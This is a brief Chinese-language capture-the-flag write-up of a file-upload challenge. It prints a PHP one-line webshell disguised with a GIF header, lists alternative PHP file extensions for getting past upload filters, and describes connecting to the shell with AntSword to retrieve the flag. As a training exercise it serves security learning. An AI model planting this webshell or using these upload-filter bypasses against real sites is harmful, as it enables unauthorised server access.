还是文件上传得题，上传有一句话木马写的且改后缀为jpg得文件，会出现提示说文件包含`<?传不了，所以修改木马为：

GIF89a? <script language="php">eval($_REQUEST[123])</script>

打开burp，抓包修改文件后缀，
发现php上传不了，
常规文件后缀为：
php2, php3, php4, php5, phps, pht, phtm, phtml
这里修改后缀为：phtml可正常上传

但上传后没有返回图片保存地址，一般上传图片都保存在upload,所以这里也是，用蚁剑连接成功，找到flag文件

总结：
一句话木马：

GIF89a? <script language="php">eval($_REQUEST[123])</script>